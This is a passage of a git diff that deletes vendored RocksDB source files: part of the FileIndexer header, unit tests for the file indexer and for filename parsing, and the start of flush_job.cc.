-    // MSVC version 1800 still does not have constexpr for ::max()
-    kLevelMaxIndex = rocksdb::port::kMaxInt32
-  };
-
- private:
-  size_t num_levels_;
-  const Comparator* ucmp_;
-
-  struct IndexUnit {
-    IndexUnit()
-      : smallest_lb(0), largest_lb(0), smallest_rb(-1), largest_rb(-1) {}
-    // During file search, a key is compared against smallest and largest
-    // from a FileMetaData. It can have 3 possible outcomes:
-    // (1) key is smaller than smallest, implying it is also smaller than
-    //     larger. Precalculated index based on "smallest < smallest" can
-    //     be used to provide right bound.
-    // (2) key is in between smallest and largest.
-    //     Precalculated index based on "smallest > greatest" can be used to
-    //     provide left bound.
-    //     Precalculated index based on "largest < smallest" can be used to
-    //     provide right bound.
-    // (3) key is larger than largest, implying it is also larger than smallest.
-    //     Precalculated index based on "largest > largest" can be used to
-    //     provide left bound.
-    //
-    // As a result, we will need to do:
-    // Compare smallest (<=) and largest keys from upper level file with
-    // smallest key from lower level to get a right bound.
-    // Compare smallest (>=) and largest keys from upper level file with
-    // largest key from lower level to get a left bound.
-    //
-    // Example:
-    //    level 1:              [50 - 60]
-    //    level 2:        [1 - 40], [45 - 55], [58 - 80]
-    // A key 35, compared to be less than 50, 3rd file on level 2 can be
-    // skipped according to rule (1). LB = 0, RB = 1.
-    // A key 53, sits in the middle 50 and 60. 1st file on level 2 can be
-    // skipped according to rule (2)-a, but the 3rd file cannot be skipped
-    // because 60 is greater than 58. LB = 1, RB = 2.
-    // A key 70, compared to be larger than 60. 1st and 2nd file can be skipped
-    // according to rule (3). LB = 2, RB = 2.
-    //
-    // Point to a left most file in a lower level that may contain a key,
-    // which compares greater than smallest of a FileMetaData (upper level)
-    int32_t smallest_lb;
-    // Point to a left most file in a lower level that may contain a key,
-    // which compares greater than largest of a FileMetaData (upper level)
-    int32_t largest_lb;
-    // Point to a right most file in a lower level that may contain a key,
-    // which compares smaller than smallest of a FileMetaData (upper level)
-    int32_t smallest_rb;
-    // Point to a right most file in a lower level that may contain a key,
-    // which compares smaller than largest of a FileMetaData (upper level)
-    int32_t largest_rb;
-  };
-
-  // Data structure to store IndexUnits in a whole level
-  struct IndexLevel {
-    size_t num_index;
-    IndexUnit* index_units;
-
-    IndexLevel() : num_index(0), index_units(nullptr) {}
-  };
-
-  void CalculateLB(
-      const std::vector<FileMetaData*>& upper_files,
-      const std::vector<FileMetaData*>& lower_files, IndexLevel* index_level,
-      std::function<int(const FileMetaData*, const FileMetaData*)> cmp_op,
-      std::function<void(IndexUnit*, int32_t)> set_index);
-
-  void CalculateRB(
-      const std::vector<FileMetaData*>& upper_files,
-      const std::vector<FileMetaData*>& lower_files, IndexLevel* index_level,
-      std::function<int(const FileMetaData*, const FileMetaData*)> cmp_op,
-      std::function<void(IndexUnit*, int32_t)> set_index);
-
-  autovector<IndexLevel> next_level_index_;
-  int32_t* level_rb_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/file_indexer_test.cc b/thirdparty/rocksdb/db/file_indexer_test.cc
deleted file mode 100644
index 5cd8c2d..0000000
--- a/thirdparty/rocksdb/db/file_indexer_test.cc
+++ /dev/null
@@ -1,350 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <string>
-#include "db/file_indexer.h"
-#include "db/dbformat.h"
-#include "db/version_edit.h"
-#include "port/stack_trace.h"
-#include "rocksdb/comparator.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class IntComparator : public Comparator {
- public:
-  int Compare(const Slice& a, const Slice& b) const override {
-    assert(a.size() == 8);
-    assert(b.size() == 8);
-    int64_t diff = *reinterpret_cast<const int64_t*>(a.data()) -
-                   *reinterpret_cast<const int64_t*>(b.data());
-    if (diff < 0) {
-      return -1;
-    } else if (diff == 0) {
-      return 0;
-    } else {
-      return 1;
-    }
-  }
-
-  const char* Name() const override { return "IntComparator"; }
-
-  void FindShortestSeparator(std::string* start,
-                             const Slice& limit) const override {}
-
-  void FindShortSuccessor(std::string* key) const override {}
-};
-
-class FileIndexerTest : public testing::Test {
- public:
-  FileIndexerTest()
-      : kNumLevels(4), files(new std::vector<FileMetaData*>[kNumLevels]) {}
-
-  ~FileIndexerTest() {
-    ClearFiles();
-    delete[] files;
-  }
-
-  void AddFile(int level, int64_t smallest, int64_t largest) {
-    auto* f = new FileMetaData();
-    f->smallest = IntKey(smallest);
-    f->largest = IntKey(largest);
-    files[level].push_back(f);
-  }
-
-  InternalKey IntKey(int64_t v) {
-    return InternalKey(Slice(reinterpret_cast<char*>(&v), 8), 0, kTypeValue);
-  }
-
-  void ClearFiles() {
-    for (uint32_t i = 0; i < kNumLevels; ++i) {
-      for (auto* f : files[i]) {
-        delete f;
-      }
-      files[i].clear();
-    }
-  }
-
-  void GetNextLevelIndex(const uint32_t level, const uint32_t file_index,
-      const int cmp_smallest, const int cmp_largest, int32_t* left_index,
-      int32_t* right_index) {
-    *left_index = 100;
-    *right_index = 100;
-    indexer->GetNextLevelIndex(level, file_index, cmp_smallest, cmp_largest,
-                               left_index, right_index);
-  }
-
-  int32_t left = 100;
-  int32_t right = 100;
-  const uint32_t kNumLevels;
-  IntComparator ucmp;
-  FileIndexer* indexer;
-
-  std::vector<FileMetaData*>* files;
-};
-
-// Case 0: Empty
-TEST_F(FileIndexerTest, Empty) {
-  Arena arena;
-  indexer = new FileIndexer(&ucmp);
-  indexer->UpdateIndex(&arena, 0, files);
-  delete indexer;
-}
-
-// Case 1: no overlap, files are on the left of next level files
-TEST_F(FileIndexerTest, no_overlap_left) {
-  Arena arena;
-  indexer = new FileIndexer(&ucmp);
-  // level 1
-  AddFile(1, 100, 200);
-  AddFile(1, 300, 400);
-  AddFile(1, 500, 600);
-  // level 2
-  AddFile(2, 1500, 1600);
-  AddFile(2, 1601, 1699);
-  AddFile(2, 1700, 1800);
-  // level 3
-  AddFile(3, 2500, 2600);
-  AddFile(3, 2601, 2699);
-  AddFile(3, 2700, 2800);
-  indexer->UpdateIndex(&arena, kNumLevels, files);
-  for (uint32_t level = 1; level < 3; ++level) {
-    for (uint32_t f = 0; f < 3; ++f) {
-      GetNextLevelIndex(level, f, -1, -1, &left, &right);
-      ASSERT_EQ(0, left);
-      ASSERT_EQ(-1, right);
-      GetNextLevelIndex(level, f, 0, -1, &left, &right);
-      ASSERT_EQ(0, left);
-      ASSERT_EQ(-1, right);
-      GetNextLevelIndex(level, f, 1, -1, &left, &right);
-      ASSERT_EQ(0, left);
-      ASSERT_EQ(-1, right);
-      GetNextLevelIndex(level, f, 1, 0, &left, &right);
-      ASSERT_EQ(0, left);
-      ASSERT_EQ(-1, right);
-      GetNextLevelIndex(level, f, 1, 1, &left, &right);
-      ASSERT_EQ(0, left);
-      ASSERT_EQ(2, right);
-    }
-  }
-  delete indexer;
-  ClearFiles();
-}
-
-// Case 2: no overlap, files are on the right of next level files
-TEST_F(FileIndexerTest, no_overlap_right) {
-  Arena arena;
-  indexer = new FileIndexer(&ucmp);
-  // level 1
-  AddFile(1, 2100, 2200);
-  AddFile(1, 2300, 2400);
-  AddFile(1, 2500, 2600);
-  // level 2
-  AddFile(2, 1500, 1600);
-  AddFile(2, 1501, 1699);
-  AddFile(2, 1700, 1800);
-  // level 3
-  AddFile(3, 500, 600);
-  AddFile(3, 501, 699);
-  AddFile(3, 700, 800);
-  indexer->UpdateIndex(&arena, kNumLevels, files);
-  for (uint32_t level = 1; level < 3; ++level) {
-    for (uint32_t f = 0; f < 3; ++f) {
-      GetNextLevelIndex(level, f, -1, -1, &left, &right);
-      ASSERT_EQ(f == 0 ? 0 : 3, left);
-      ASSERT_EQ(2, right);
-      GetNextLevelIndex(level, f, 0, -1, &left, &right);
-      ASSERT_EQ(3, left);
-      ASSERT_EQ(2, right);
-      GetNextLevelIndex(level, f, 1, -1, &left, &right);
-      ASSERT_EQ(3, left);
-      ASSERT_EQ(2, right);
-      GetNextLevelIndex(level, f, 1, -1, &left, &right);
-      ASSERT_EQ(3, left);
-      ASSERT_EQ(2, right);
-      GetNextLevelIndex(level, f, 1, 0, &left, &right);
-      ASSERT_EQ(3, left);
-      ASSERT_EQ(2, right);
-      GetNextLevelIndex(level, f, 1, 1, &left, &right);
-      ASSERT_EQ(3, left);
-      ASSERT_EQ(2, right);
-    }
-  }
-  delete indexer;
-}
-
-// Case 3: empty L2
-TEST_F(FileIndexerTest, empty_L2) {
-  Arena arena;
-  indexer = new FileIndexer(&ucmp);
-  for (uint32_t i = 1; i < kNumLevels; ++i) {
-    ASSERT_EQ(0U, indexer->LevelIndexSize(i));
-  }
-  // level 1
-  AddFile(1, 2100, 2200);
-  AddFile(1, 2300, 2400);
-  AddFile(1, 2500, 2600);
-  // level 3
-  AddFile(3, 500, 600);
-  AddFile(3, 501, 699);
-  AddFile(3, 700, 800);
-  indexer->UpdateIndex(&arena, kNumLevels, files);
-  for (uint32_t f = 0; f < 3; ++f) {
-    GetNextLevelIndex(1, f, -1, -1, &left, &right);
-    ASSERT_EQ(0, left);
-    ASSERT_EQ(-1, right);
-    GetNextLevelIndex(1, f, 0, -1, &left, &right);
-    ASSERT_EQ(0, left);
-    ASSERT_EQ(-1, right);
-    GetNextLevelIndex(1, f, 1, -1, &left, &right);
-    ASSERT_EQ(0, left);
-    ASSERT_EQ(-1, right);
-    GetNextLevelIndex(1, f, 1, -1, &left, &right);
-    ASSERT_EQ(0, left);
-    ASSERT_EQ(-1, right);
-    GetNextLevelIndex(1, f, 1, 0, &left, &right);
-    ASSERT_EQ(0, left);
-    ASSERT_EQ(-1, right);
-    GetNextLevelIndex(1, f, 1, 1, &left, &right);
-    ASSERT_EQ(0, left);
-    ASSERT_EQ(-1, right);
-  }
-  delete indexer;
-  ClearFiles();
-}
-
-// Case 4: mixed
-TEST_F(FileIndexerTest, mixed) {
-  Arena arena;
-  indexer = new FileIndexer(&ucmp);
-  // level 1
-  AddFile(1, 100, 200);
-  AddFile(1, 250, 400);
-  AddFile(1, 450, 500);
-  // level 2
-  AddFile(2, 100, 150);  // 0
-  AddFile(2, 200, 250);  // 1
-  AddFile(2, 251, 300);  // 2
-  AddFile(2, 301, 350);  // 3
-  AddFile(2, 500, 600);  // 4
-  // level 3
-  AddFile(3, 0, 50);
-  AddFile(3, 100, 200);
-  AddFile(3, 201, 250);
-  indexer->UpdateIndex(&arena, kNumLevels, files);
-  // level 1, 0
-  GetNextLevelIndex(1, 0, -1, -1, &left, &right);
-  ASSERT_EQ(0, left);
-  ASSERT_EQ(0, right);
-  GetNextLevelIndex(1, 0, 0, -1, &left, &right);
-  ASSERT_EQ(0, left);
-  ASSERT_EQ(0, right);
-  GetNextLevelIndex(1, 0, 1, -1, &left, &right);
-  ASSERT_EQ(0, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(1, 0, 1, 0, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(1, 0, 1, 1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(4, right);
-  // level 1, 1
-  GetNextLevelIndex(1, 1, -1, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(1, 1, 0, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(1, 1, 1, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(3, right);
-  GetNextLevelIndex(1, 1, 1, 0, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(3, right);
-  GetNextLevelIndex(1, 1, 1, 1, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(4, right);
-  // level 1, 2
-  GetNextLevelIndex(1, 2, -1, -1, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(3, right);
-  GetNextLevelIndex(1, 2, 0, -1, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(3, right);
-  GetNextLevelIndex(1, 2, 1, -1, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(4, right);
-  GetNextLevelIndex(1, 2, 1, 0, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(4, right);
-  GetNextLevelIndex(1, 2, 1, 1, &left, &right);
-  ASSERT_EQ(4, left);
-  ASSERT_EQ(4, right);
-  // level 2, 0
-  GetNextLevelIndex(2, 0, -1, -1, &left, &right);
-  ASSERT_EQ(0, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(2, 0, 0, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(2, 0, 1, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(2, 0, 1, 0, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(2, 0, 1, 1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(2, right);
-  // level 2, 1
-  GetNextLevelIndex(2, 1, -1, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(2, 1, 0, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(1, right);
-  GetNextLevelIndex(2, 1, 1, -1, &left, &right);
-  ASSERT_EQ(1, left);
-  ASSERT_EQ(2, right);
-  GetNextLevelIndex(2, 1, 1, 0, &left, &right);
-  ASSERT_EQ(2, left);
-  ASSERT_EQ(2, right);
-  GetNextLevelIndex(2, 1, 1, 1, &left, &right);
-  ASSERT_EQ(2, left);
-  ASSERT_EQ(2, right);
-  // level 2, [2 - 4], no overlap
-  for (uint32_t f = 2; f <= 4; ++f) {
-    GetNextLevelIndex(2, f, -1, -1, &left, &right);
-    ASSERT_EQ(f == 2 ? 2 : 3, left);
-    ASSERT_EQ(2, right);
-    GetNextLevelIndex(2, f, 0, -1, &left, &right);
-    ASSERT_EQ(3, left);
-    ASSERT_EQ(2, right);
-    GetNextLevelIndex(2, f, 1, -1, &left, &right);
-    ASSERT_EQ(3, left);
-    ASSERT_EQ(2, right);
-    GetNextLevelIndex(2, f, 1, 0, &left, &right);
-    ASSERT_EQ(3, left);
-    ASSERT_EQ(2, right);
-    GetNextLevelIndex(2, f, 1, 1, &left, &right);
-    ASSERT_EQ(3, left);
-    ASSERT_EQ(2, right);
-  }
-  delete indexer;
-  ClearFiles();
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/filename_test.cc b/thirdparty/rocksdb/db/filename_test.cc
deleted file mode 100644
index d6bde52..0000000
--- a/thirdparty/rocksdb/db/filename_test.cc
+++ /dev/null
@@ -1,180 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/filename.h"
-
-#include "db/dbformat.h"
-#include "port/port.h"
-#include "util/logging.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class FileNameTest : public testing::Test {};
-
-TEST_F(FileNameTest, Parse) {
-  Slice db;
-  FileType type;
-  uint64_t number;
-
-  char kDefautInfoLogDir = 1;
-  char kDifferentInfoLogDir = 2;
-  char kNoCheckLogDir = 4;
-  char kAllMode = kDefautInfoLogDir | kDifferentInfoLogDir | kNoCheckLogDir;
-
-  // Successful parses
-  static struct {
-    const char* fname;
-    uint64_t number;
-    FileType type;
-    char mode;
-  } cases[] = {
-        {"100.log", 100, kLogFile, kAllMode},
-        {"0.log", 0, kLogFile, kAllMode},
-        {"0.sst", 0, kTableFile, kAllMode},
-        {"CURRENT", 0, kCurrentFile, kAllMode},
-        {"LOCK", 0, kDBLockFile, kAllMode},
-        {"MANIFEST-2", 2, kDescriptorFile, kAllMode},
-        {"MANIFEST-7", 7, kDescriptorFile, kAllMode},
-        {"METADB-2", 2, kMetaDatabase, kAllMode},
-        {"METADB-7", 7, kMetaDatabase, kAllMode},
-        {"LOG", 0, kInfoLogFile, kDefautInfoLogDir},
-        {"LOG.old", 0, kInfoLogFile, kDefautInfoLogDir},
-        {"LOG.old.6688", 6688, kInfoLogFile, kDefautInfoLogDir},
-        {"rocksdb_dir_LOG", 0, kInfoLogFile, kDifferentInfoLogDir},
-        {"rocksdb_dir_LOG.old", 0, kInfoLogFile, kDifferentInfoLogDir},
-        {"rocksdb_dir_LOG.old.6688", 6688, kInfoLogFile, kDifferentInfoLogDir},
-        {"18446744073709551615.log", 18446744073709551615ull, kLogFile,
-         kAllMode}, };
-  for (char mode : {kDifferentInfoLogDir, kDefautInfoLogDir, kNoCheckLogDir}) {
-    for (unsigned int i = 0; i < sizeof(cases) / sizeof(cases[0]); i++) {
-      InfoLogPrefix info_log_prefix(mode != kDefautInfoLogDir, "/rocksdb/dir");
-      if (cases[i].mode & mode) {
-        std::string f = cases[i].fname;
-        if (mode == kNoCheckLogDir) {
-          ASSERT_TRUE(ParseFileName(f, &number, &type)) << f;
-        } else {
-          ASSERT_TRUE(ParseFileName(f, &number, info_log_prefix.prefix, &type))
-              << f;
-        }
-        ASSERT_EQ(cases[i].type, type) << f;
-        ASSERT_EQ(cases[i].number, number) << f;
-      }
-    }
-  }
-
-  // Errors
-  static const char* errors[] = {
-    "",
-    "foo",
-    "foo-dx-100.log",
-    ".log",
-    "",
-    "manifest",
-    "CURREN",
-    "CURRENTX",
-    "MANIFES",
-    "MANIFEST",
-    "MANIFEST-",
-    "XMANIFEST-3",
-    "MANIFEST-3x",
-    "META",
-    "METADB",
-    "METADB-",
-    "XMETADB-3",
-    "METADB-3x",
-    "LOC",
-    "LOCKx",
-    "LO",
-    "LOGx",
-    "18446744073709551616.log",
-    "184467440737095516150.log",
-    "100",
-    "100.",
-    "100.lop"
-  };
-  for (unsigned int i = 0; i < sizeof(errors) / sizeof(errors[0]); i++) {
-    std::string f = errors[i];
-    ASSERT_TRUE(!ParseFileName(f, &number, &type)) << f;
-  };
-}
-
-TEST_F(FileNameTest, InfoLogFileName) {
-  std::string dbname = ("/data/rocksdb");
-  std::string db_absolute_path;
-  Env::Default()->GetAbsolutePath(dbname, &db_absolute_path);
-
-  ASSERT_EQ("/data/rocksdb/LOG", InfoLogFileName(dbname, db_absolute_path, ""));
-  ASSERT_EQ("/data/rocksdb/LOG.old.666",
-            OldInfoLogFileName(dbname, 666u, db_absolute_path, ""));
-
-  ASSERT_EQ("/data/rocksdb_log/data_rocksdb_LOG",
-            InfoLogFileName(dbname, db_absolute_path, "/data/rocksdb_log"));
-  ASSERT_EQ(
-      "/data/rocksdb_log/data_rocksdb_LOG.old.666",
-      OldInfoLogFileName(dbname, 666u, db_absolute_path, "/data/rocksdb_log"));
-}
-
-TEST_F(FileNameTest, Construction) {
-  uint64_t number;
-  FileType type;
-  std::string fname;
-
-  fname = CurrentFileName("foo");
-  ASSERT_EQ("foo/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(0U, number);
-  ASSERT_EQ(kCurrentFile, type);
-
-  fname = LockFileName("foo");
-  ASSERT_EQ("foo/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(0U, number);
-  ASSERT_EQ(kDBLockFile, type);
-
-  fname = LogFileName("foo", 192);
-  ASSERT_EQ("foo/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(192U, number);
-  ASSERT_EQ(kLogFile, type);
-
-  fname = TableFileName({DbPath("bar", 0)}, 200, 0);
-  std::string fname1 =
-      TableFileName({DbPath("foo", 0), DbPath("bar", 0)}, 200, 1);
-  ASSERT_EQ(fname, fname1);
-  ASSERT_EQ("bar/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(200U, number);
-  ASSERT_EQ(kTableFile, type);
-
-  fname = DescriptorFileName("bar", 100);
-  ASSERT_EQ("bar/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(100U, number);
-  ASSERT_EQ(kDescriptorFile, type);
-
-  fname = TempFileName("tmp", 999);
-  ASSERT_EQ("tmp/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(999U, number);
-  ASSERT_EQ(kTempFile, type);
-
-  fname = MetaDatabaseName("met", 100);
-  ASSERT_EQ("met/", std::string(fname.data(), 4));
-  ASSERT_TRUE(ParseFileName(fname.c_str() + 4, &number, &type));
-  ASSERT_EQ(100U, number);
-  ASSERT_EQ(kMetaDatabase, type);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/flush_job.cc b/thirdparty/rocksdb/db/flush_job.cc
deleted file mode 100644
index 778c9ec..0000000
--- a/thirdparty/rocksdb/db/flush_job.cc
+++ /dev/null
@@ -1,362 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/flush_job.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-
-#include <algorithm>
-#include <vector>
-
-#include "db/builder.h"
-#include "db/db_iter.h"
-#include "db/dbformat.h"
-#include "db/event_helpers.h"
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "db/memtable_list.h"
-#include "db/merge_context.h"
-#include "db/version_set.h"
-#include "monitoring/iostats_context_imp.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/thread_status_util.h"
-#include "port/likely.h"
-#include "port/port.h"
-#include "db/memtable.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-#include "table/block.h"
-#include "table/block_based_table_factory.h"
-#include "table/merging_iterator.h"
-#include "table/table_builder.h"
-#include "table/two_level_iterator.h"
-#include "util/coding.h"
-#include "util/event_logger.h"
-#include "util/file_util.h"
-#include "util/filename.h"
-#include "util/log_buffer.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/stop_watch.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-FlushJob::FlushJob(const std::string& dbname, ColumnFamilyData* cfd,
-                   const ImmutableDBOptions& db_options,
-                   const MutableCFOptions& mutable_cf_options,
-                   const EnvOptions& env_options, VersionSet* versions,
-                   InstrumentedMutex* db_mutex,
-                   std::atomic<bool>* shutting_down,
-                   std::vector<SequenceNumber> existing_snapshots,
-                   SequenceNumber earliest_write_conflict_snapshot,
-                   JobContext* job_context, LogBuffer* log_buffer,
-                   Directory* db_directory, Directory* output_file_directory,
-                   CompressionType output_compression, Statistics* stats,
-                   EventLogger* event_logger, bool measure_io_stats)
-    : dbname_(dbname),
-      cfd_(cfd),
-      db_options_(db_options),
-      mutable_cf_options_(mutable_cf_options),
-      env_options_(env_options),
-      versions_(versions),
-      db_mutex_(db_mutex),
-      shutting_down_(shutting_down),
-      existing_snapshots_(std::move(existing_snapshots)),
-      earliest_write_conflict_snapshot_(earliest_write_conflict_snapshot),
-      job_context_(job_context),
-      log_buffer_(log_buffer),
-      db_directory_(db_directory),
-      output_file_directory_(output_file_directory),
-      output_compression_(output_compression),
-      stats_(stats),
-      event_logger_(event_logger),
-      measure_io_stats_(measure_io_stats),
-      pick_memtable_called(false) {
-  // Update the thread status to indicate flush.
-  ReportStartedFlush();
-  TEST_SYNC_POINT("FlushJob::FlushJob()");
-}
-
-FlushJob::~FlushJob() {
-  ThreadStatusUtil::ResetThreadStatus();
-}
-
-void FlushJob::ReportStartedFlush() {
-  ThreadStatusUtil::SetColumnFamily(cfd_, cfd_->ioptions()->env,
-                                    db_options_.enable_thread_tracking);
-  ThreadStatusUtil::SetThreadOperation(ThreadStatus::OP_FLUSH);
-  ThreadStatusUtil::SetThreadOperationProperty(
-      ThreadStatus::COMPACTION_JOB_ID,
-      job_context_->job_id);
-  IOSTATS_RESET(bytes_written);
-}
-
-void FlushJob::ReportFlushInputSize(const autovector<MemTable*>& mems) {
-  uint64_t input_size = 0;
-  for (auto* mem : mems) {
-    input_size += mem->ApproximateMemoryUsage();
-  }
-  ThreadStatusUtil::IncreaseThreadOperationProperty(
-      ThreadStatus::FLUSH_BYTES_MEMTABLES,
-      input_size);
-}
-
-void FlushJob::RecordFlushIOStats() {
-  RecordTick(stats_, FLUSH_WRITE_BYTES, IOSTATS(bytes_written));
-  ThreadStatusUtil::IncreaseThreadOperationProperty(
-      ThreadStatus::FLUSH_BYTES_WRITTEN, IOSTATS(bytes_written));
-  IOSTATS_RESET(bytes_written);
-}
-
-void FlushJob::PickMemTable() {
-  db_mutex_->AssertHeld();
-  assert(!pick_memtable_called);
-  pick_memtable_called = true;
-  // Save the contents of the earliest memtable as a new Table
-  cfd_->imm()->PickMemtablesToFlush(&mems_);
-  if (mems_.empty()) {
-    return;
-  }
-
-  ReportFlushInputSize(mems_);
-
-  // entries mems are (implicitly) sorted in ascending order by their created
-  // time. We will use the first memtable's `edit` to keep the meta info for
-  // this flush.
-  MemTable* m = mems_[0];
-  edit_ = m->GetEdits();
-  edit_->SetPrevLogNumber(0);
-  // SetLogNumber(log_num) indicates logs with number smaller than log_num
-  // will no longer be picked up for recovery.
-  edit_->SetLogNumber(mems_.back()->GetNextLogNumber());
-  edit_->SetColumnFamily(cfd_->GetID());
-
-  // path 0 for level 0 file.
-  meta_.fd = FileDescriptor(versions_->NewFileNumber(), 0, 0);
-
-  base_ = cfd_->current();
-  base_->Ref();  // it is likely that we do not need this reference
-}
-
-Status FlushJob::Run(FileMetaData* file_meta) {
-  db_mutex_->AssertHeld();
-  assert(pick_memtable_called);
-  AutoThreadOperationStageUpdater stage_run(
-      ThreadStatus::STAGE_FLUSH_RUN);
-  if (mems_.empty()) {
-    ROCKS_LOG_BUFFER(log_buffer_, "[%s] Nothing in memtable to flush",
-                     cfd_->GetName().c_str());
-    return Status::OK();
-  }
-
-  // I/O measurement variables
-  PerfLevel prev_perf_level = PerfLevel::kEnableTime;
-  uint64_t prev_write_nanos = 0;
-  uint64_t prev_fsync_nanos = 0;
-  uint64_t prev_range_sync_nanos = 0;
-  uint64_t prev_prepare_write_nanos = 0;
-  if (measure_io_stats_) {
-    prev_perf_level = GetPerfLevel();
-    SetPerfLevel(PerfLevel::kEnableTime);
-    prev_write_nanos = IOSTATS(write_nanos);
-    prev_fsync_nanos = IOSTATS(fsync_nanos);
-    prev_range_sync_nanos = IOSTATS(range_sync_nanos);
-    prev_prepare_write_nanos = IOSTATS(prepare_write_nanos);
-  }
-
-  // This will release and re-acquire the mutex.
-  Status s = WriteLevel0Table();
-
-  if (s.ok() &&
-      (shutting_down_->load(std::memory_order_acquire) || cfd_->IsDropped())) {
-    s = Status::ShutdownInProgress(
-        "Database shutdown or Column family drop during flush");
-  }
-
-  if (!s.ok()) {
-    cfd_->imm()->RollbackMemtableFlush(mems_, meta_.fd.GetNumber());
-  } else {
-    TEST_SYNC_POINT("FlushJob::InstallResults");
-    // Replace immutable memtable with the generated Table
-    s = cfd_->imm()->InstallMemtableFlushResults(
-        cfd_, mutable_cf_options_, mems_, versions_, db_mutex_,
-        meta_.fd.GetNumber(), &job_context_->memtables_to_free, db_directory_,
-        log_buffer_);
-  }
-
-  if (s.ok() && file_meta != nullptr) {
-    *file_meta = meta_;
-  }
-  RecordFlushIOStats();
-
-  auto stream = event_logger_->LogToBuffer(log_buffer_);
-  stream << "job" << job_context_->job_id << "event"
-         << "flush_finished";
-  stream << "lsm_state";
-  stream.StartArray();
-  auto vstorage = cfd_->current()->storage_info();
-  for (int level = 0; level < vstorage->num_levels(); ++level) {
-    stream << vstorage->NumLevelFiles(level);
-  }
-  stream.EndArray();
-  stream << "immutable_memtables" << cfd_->imm()->NumNotFlushed();
-
-  if (measure_io_stats_) {
-    if (prev_perf_level != PerfLevel::kEnableTime) {
-      SetPerfLevel(prev_perf_level);
-    }
-    stream << "file_write_nanos" << (IOSTATS(write_nanos) - prev_write_nanos);
-    stream << "file_range_sync_nanos"
-           << (IOSTATS(range_sync_nanos) - prev_range_sync_nanos);
-    stream << "file_fsync_nanos" << (IOSTATS(fsync_nanos) - prev_fsync_nanos);
-    stream << "file_prepare_write_nanos"
-           << (IOSTATS(prepare_write_nanos) - prev_prepare_write_nanos);
-  }
-
-  return s;
-}
-
-void FlushJob::Cancel() {
